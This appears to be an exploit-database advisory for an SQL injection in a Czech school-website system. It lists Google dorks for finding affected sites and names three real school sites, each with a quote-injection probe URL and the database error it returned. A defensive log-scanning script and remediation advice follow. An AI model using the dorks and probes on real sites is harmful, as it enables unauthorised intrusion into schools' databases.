Copyright © 2011 - 2018 Vitalex Computers Tvorba školních webů SQL Injection

2018.05.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#######################################################################################
# Exploit Title : Czech Copyright © 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba školních webů SQL Injection Vulnerability
# Author : KingSkrupellos from Cyberizm Digital Security Team
# Date : 26/05/2018
# Vendor Homepages : vitalex.cz
# Exploit Risk : Medium
#######################################################################################
# Google Dork 1 : intext:'' Vitalex Computers - Tvorba školních webů'' site:cz
# Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
# Google Dork 3 : inurl:''/public/printAction.php?id=''

Other Possible Dorks =>

inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
########################################################################################
# Example Sites =>

# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
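For operators of affected sites, a log check for the request shape reported above (an `id` value that is not a plain integer on `/public/printAction.php` or `/index.php`). This is an added example, not part of the original advisory; the combined access-log format, the function names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints the advisory shows taking a numeric `id` parameter.
WATCHED_PATHS = {"/public/printAction.php", "/index.php"}

# Request field of an Apache/nginx combined log line (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_id(target):
    """Return the decoded id value if it is not a plain integer, else None."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_PATHS:
        return None
    # parse_qs percent-decodes, so %27 becomes a literal single quote.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if not INTEGER_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line number, client address, decoded id) for each flagged request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_id(match.group("target"))
        if value is not None:
            hits.append((lineno, line.split()[0], value))
    return hits


# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/May/2018:10:01:02 +0200] "GET /public/printAction.php?id=235 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/May/2018:10:01:05 +0200] "GET /public/printAction.php?id=235%27 HTTP/1.1" 200 310',
    '198.51.100.4 - - [26/May/2018:10:02:11 +0200] "GET /index.php?type=Blog&id=12 HTTP/1.1" 200 8841',
    '198.51.100.4 - - [26/May/2018:10:02:15 +0200] "GET /index.php?type=Blog&id=12%27 HTTP/1.1" 200 305',
    '192.0.2.15 - - [26/May/2018:10:03:00 +0200] "GET /public/style.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, client, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent non-integer id {value!r}")
```

A hit only shows that the parameter was probed; the fix on the server side is to validate `id` as an integer and bind it through a prepared statement.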



Copyright 2024, cxsecurity.com

 
